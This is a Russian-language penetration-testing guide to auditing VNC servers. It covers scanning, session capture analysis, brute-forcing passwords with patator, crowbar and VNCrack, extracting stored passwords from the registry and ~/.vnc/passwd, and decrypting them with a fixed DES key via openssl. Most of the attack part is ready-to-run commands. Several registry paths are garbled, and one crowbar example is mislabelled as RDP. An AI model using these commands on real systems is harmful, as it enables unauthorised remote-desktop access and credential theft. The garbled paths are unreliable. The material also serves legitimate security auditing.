Аудит безопасности VNCАудит безопасности VNC

Поиск компьютеров с VNC
По умолчанию RFB использует диапазон TCP-портов с 5900 до 5906. Каждый порт представляет собой соответствующий экран X-сервера (порты с 5900 по 5906 ассоциированы с экранами с :0 по :6).

Java Viewer и HTTP VNC используют порт 5800.
Просмотрщик (клиент) VNC в режиме прослушивания (Listening mode) прослушивает порт 5500.
Для сканирования сети в поисках VNC серверов и клиентов в режиме прослушивания:
sudo nmap -p 5500,5800,5900-5906 --open СЕТЬ

Например:
sudo nmap -p 5500,5800,5900-5906 --open 192.168.43.0/24

Анализ VNC трафика
Сессии VNC могут быть записаны, например, во время атак человек-посередине.

Для извлечения challenge и response VNC сессии можно использовать Ettercap:
ettercap -Tq -r ФАЙЛ.pcapng

С помощью фильтров Wireshark можно провести детальный анализ VNC сессии:
Чтобы показать только трафик VNC сессий:
vnc

VNC challenge (вызов):
vnc.auth_challenge

VNC response (ответ):
vnc.auth_response

Результат попытки аутентификации на VNC сервере:
vnc.auth_result

Вызов, ответ и результат попытки аутентификации на VNC сервере:
vnc.authchallenge or vnc.authresponse or vnc.auth_result

Имя компьютера с VNC сервером:
vnc.desktop_name

Позиция кнопок мыши:
vnc.button_1_pos
vnc.button_2_pos
…………...
vnc.button_8_pos
Выбранный тип безопасности:
vnc.client_security_type

Тип кодирования:
vnc.client_set_encodings_encoding_type

Версия VNC протокола клиента:
Версия VNC протокола сервера:
vnc.server_proto_ver

Ширина Framebuffer:
vnc.width
Клавиша:
vnc.key

Нажатие клавиши:
vnc.key_down
Данные передаваемого видео в формате H.264:
vnc.h264_data

Вырезанный текст:
vnc.client_cut_text

Взлом VNC пароля
Можно использовать разные приёмы для взлома VNC пароля:
Взлом пароля VNC сессии
Расшифровка сохранённого пароля VNC сервера
Брут-форс пароля сервера VNC
Взлом пароля VNC сессии
Из захваченной VNC сессии нужно извлечь Authentication challenge и Authentication response.
Если вы не хотите разбираться с методом, описанным для Hashcat, то используйте программу VNCrack.
Установка VNCrack
Установка в Kali Linux

wget http://www.phenoelit.org/vncrack/vncrack_s.gz
gunzip vncracks.gz chmod +x vncracks
./vncrack_s
Установка в BlackArch
sudo pacman -S vncrack
Установка в Widnows
Скачайте файл http://www.phenoelit.org/vncrack/x4.exe и запустите его в командной строке.
Для взлома с VNCrack достаточно указать вызов, ответ и файл словаря, например, взлом пароля из перехваченной VNC сессии содержащий вызов (-c 894443629f4a9675809cff5da2e84651) и ответ (-r 271d94eb610b5c42588dc53506419e6a), пароли для брут-форса берутся из словаря (-w passwords.txt):
vncrack -c 894443629f4a9675809cff5da2e84651 -r 271d94eb610b5c42588dc53506419e6a -w passwords.txt

Брут-форс серверов VNC
Рассмотрим программы для брут-форса пароля серверов VNC.
Сервера VNC отклоняют подключения после нескольких неудачных попыток, поэтому брут-форс VNC нужно выполнять в один поток с большим интервалом между запросами.
patator это одна из самых универсальных и гибких в настройке программа для брут-форса.
В следующем примере время ожидания между запросами установлено на 61 секунду:
patator vnc_login host=192.168.43.250 password=FILE0 0=passwords.txt -t 1 -x quit:code=0 -x ignore:fgrep='authentication rejected' -x ignore:fgrep='Authentication failure' --rate-limit=61
Примеры ошибок, когда сервер отверг ваше подключение без проверки пароля:
Session setup failed: "Your connection has been rejected.
password check failed!
Как можно увидеть на следующих скриншотах, несмотря на долгое время брут-форса и парочку сообщений об ошибках, пароли на двух серверах VNC всё таки были подобраны:

Crowbar
 (ранее известный как Levye) — это инструмент для брут-форса, который может использоваться во время тестов на проникновение. Он создан для поддержки протоколов, которые в настоящее время не поддерживаются в THC-Hydra и другими популярными инструментами брут-форса.
Установка Crowbar
sudo apt install crowbar freerdp2-x11 openvpn nmap
Установка в BlackArch
sudo pacman -S crowbar freerdp openvpn nmap

Пример брут-форса службы RDP на единичном хосте (-s 192.168.86.61/32) со словарём паролей (-C /root/words.txt) используя 1 поток (-n 1):
crowbar -b vnckey -s 192.168.86.61/32 -C /root/words.txt -n 1

VNCrack
Об установке программы VNCrack сказано чуть выше.
Пример запуска брут-форса:
vncrack -h 192.168.43.250 -w passwords.txt

Расшифровка хранимых VNC паролей
Сервер VNC хранит пароль на компьютере в закодированном виде. Имеется множество способов извлечь этот пароль. Рассмотрим программы и способы расшифровки сохранённого пароля VNC сервера.
VNCPassView
VNCPassView — это небольшая утилита для восстановления паролей, сохранённых инструментами VNC.

Где Windows хранить VNC пароли
Пароли VNC в Windows хранятся в реестре в следующих ветках (список может быть неполным):
\HKEYLOCALMACHINE\SOFTWARE\TigerVNC\WinVNC4
\HKEY_LLOCALCHINE\SOFTWARE\TightVNC\Server
\HKEY_LOCLOCALINE\SOFTWARE\ORL\WinVNC3\Default
\HKEY_LOCALLOCALE\SOFTWARE\RealVNC\WinVNC4\
\HKEY_CURRENTCURRENTtware\TightVNC
\HKEYCURRENTUCURRENTare\TurboVNC
\HKEYCURRENTUSECURRENTe\ORL\WinVNC3\Password
\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password
Пароль хранится в бинарном виде, его длина 8 байт.

Для чтения пароля из реестра можно воспользоваться командами для сохранения фрагментов реестра в файлы .reg, например:

regedit.exe /E winvnc3.reg "HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\"
regedit.exe /E winvnc4.reg "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4\"
Расшифровка пароля в VNCrack
С помощью VNCrack можно извлечь закодированный пароль, для этого запустите программу в интерактивном режиме:

Затем введите байты пароль — два байта на строку, например так:
14
cc
ac
84
2f
6f
8d
0d

В результате будет выведена итоговая строка и закодированный пароль:

Entered HEX String: 14 cc ac 84 2f 6f 8d d
VNC Password: 222222
Где Linux хранить VNC пароли
В Linux пароли могут храниться где угодно, но файлом по умолчанию является ~/.vnc/passwd. Для его просмотра откройте его любым редактором, способным отображать шестнадцатеричные данные:

Расшифровка пароля в Linux
В Linux также можно воспользоваться помощью VNCrack:
vncrack -C ~/.vnc/passwd

Восстановление пароля VNC сервера, хранимого в файле ~/.vnc/passwd:

Либо можете воспользоваться способом, который описал Bill Chaison: https://github.com/billchaison/VNCDecrypt. Для этого достаточно запустить команду следующего вида:
echo -n БАЙТЫ_ПАРОЛЯ | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
Например:
echo -n F0E43164F6C2E373 | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

Скрипты nmap для аудита VNC
Страница с перечнем NSE (скрипты Nmap): https://nmap.org/nsedoc/. На ней присутствуют следующие скрипты:
realvnc-auth-bypass
Проверяет, уязвим ли VNC-сервер к обходу аутентификации RealVNC (CVE-2006-2369).
vnc-brute
Выполняет брут-форс пароля VNC серверов.
vnc-info
Запрашивает у сервера VNC версию протокола и поддерживаемые типы безопасности.
Пытается войти на сервер VNC и получить имя его рабочего стола. Использует учетные данные, обнаруженные типами аутентификации vnc-brute или None. Если realvnc-auth-bypass был запущен и возвращен VULNERABLE, этот сценарий будет использовать эту уязвимость для обхода аутентификации.
Для запуска нужно использовать опцию --script, после которой можно указать скрипт, либо несколько скриптов через запятую:
sudo nmap -p 5500,5800,5900-5906 --script realvnc-auth-bypass,vnc-brute,vnc-info,vnc-title ХОСТ_ИЛИ_СЕТЬ

Также можно задействовать все скрипты следующим образом:
sudo nmap -p 5500,5800,5900-5906 --script 'vnc-*' ХОСТИЛИСЕТЬ